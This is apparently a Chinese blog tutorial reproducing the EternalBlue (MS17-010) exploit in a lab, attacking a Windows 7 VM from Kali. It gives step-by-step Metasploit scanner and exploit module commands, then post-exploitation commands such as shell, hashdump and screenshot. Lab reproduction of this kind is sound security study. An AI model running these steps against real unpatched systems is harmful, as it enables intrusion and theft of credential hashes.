使用Kali复现永恒之蓝漏洞(ms17-010)

目录

漏洞简介:

漏洞复现:

实验环境:

复现过程:

1.使用MSF的永恒之蓝漏洞模块

2.部分功能举例


漏洞简介:

漏洞名称:“永恒之蓝”漏洞

漏洞编号:MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148

漏洞类型:缓冲区溢出漏洞

微软已于2017 年 发布MS17-010补丁

漏洞复现:

实验环境:

靶机:Windows7(IP:192.168.81.132)

攻击机:kali linux(IP:192.168.81.133)

实验条件:两台虚拟机可以实现相互ping通,并且靶机(无补丁)开启了445端口,防火墙关闭。

复现过程:

1.使用MSF的永恒之蓝漏洞模块

打开kali,启动我们的Metasploit渗透工具

sudo msfconsole

search ms17-010  #搜索msf中和ms17-010漏洞有关的脚本

这里可以得到一些工具,其中
auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块,

exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

使用ms17-010的辅助性脚本

use auxiliary/scanner/smb/smb_ms17_010  #使用ms17-010的辅助模块

配置ms17-010的辅助性脚本

show options   #查看有哪些项需要进行配置

set  rhosts   192.168.81.132  #配置要攻击的靶机的ip地址

配置完成后,执行ms17-010的辅助性脚本

run   #运行模块

使用ms17-010攻击性模块

use exploit/windows/smb/ms17_010_eternalblue  #使用ms17-010的攻击模块

show options  #查看配置项

设置被攻击机器ip

set rhosts 192.168.81.132  #设置被攻击机器ip

 

运行ms17-010攻击模块

run

 

成功建立会话后,可以做的事情很多。以下有部分举例

2.部分功能举例

(1)ipconfig  #查看靶机网络配置

    ifconfig   #查看靶机网络配置\

(2)shell    #直接给一个shell命令执行终端

exit   #退出shell命令执行终端

 

注: 这里的乱码问题应该是msf的终端活动页与中文的不兼容导致的chcp 65001 可解决乱码问题。

 (3)sysinfo  #查看靶机信息

(4)hashdump  #下载靶机用户的hash

(5)ps    #查看靶机正在运行的进程 

 

(6)screenshot #截图

 

 (7)使用upload命令将Server应用程序上传到win7虚拟机C盘的Windows文件夹里

 

 

 

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值